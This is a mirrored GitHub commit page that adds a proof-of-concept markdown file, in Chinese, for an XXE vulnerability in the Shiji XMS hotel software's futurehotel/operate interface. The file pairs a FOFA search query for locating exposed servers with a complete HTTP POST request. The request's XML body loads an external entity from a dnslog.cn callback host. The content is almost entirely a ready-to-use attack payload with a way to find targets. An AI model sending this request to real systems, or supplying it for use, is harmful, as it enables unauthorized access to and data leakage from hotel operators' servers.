mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 西软云XMS-futurehotel-operate接口存在XXE漏洞.md
This commit is contained in:
parent
ea24b4dc16
commit
a9f223f8e7
18
西软云XMS-futurehotel-operate接口存在XXE漏洞.md
Normal file
18
西软云XMS-futurehotel-operate接口存在XXE漏洞.md
Normal file
@ -0,0 +1,18 @@
|
||||
## 西软云XMS-futurehotel-operate接口存在XXE漏洞
|
||||
|
||||
## fofa
|
||||
```
|
||||
app="shiji-西软云XMS"
|
||||
```
|
||||
|
||||
## poc
|
||||
```
|
||||
POST /XopServerRS/rest/futurehotel/operate HTTP/1.1
|
||||
Host: your-ip
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.3157.54 Safari/537.36
|
||||
Connection: close
|
||||
Content-Type: text/xml
|
||||
Accept-Encoding: gzip
|
||||
|
||||
<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://xxx.dnslog.cn"> %remote;]>
|
||||
```
|
||||
Loading…
x
Reference in New Issue
Block a user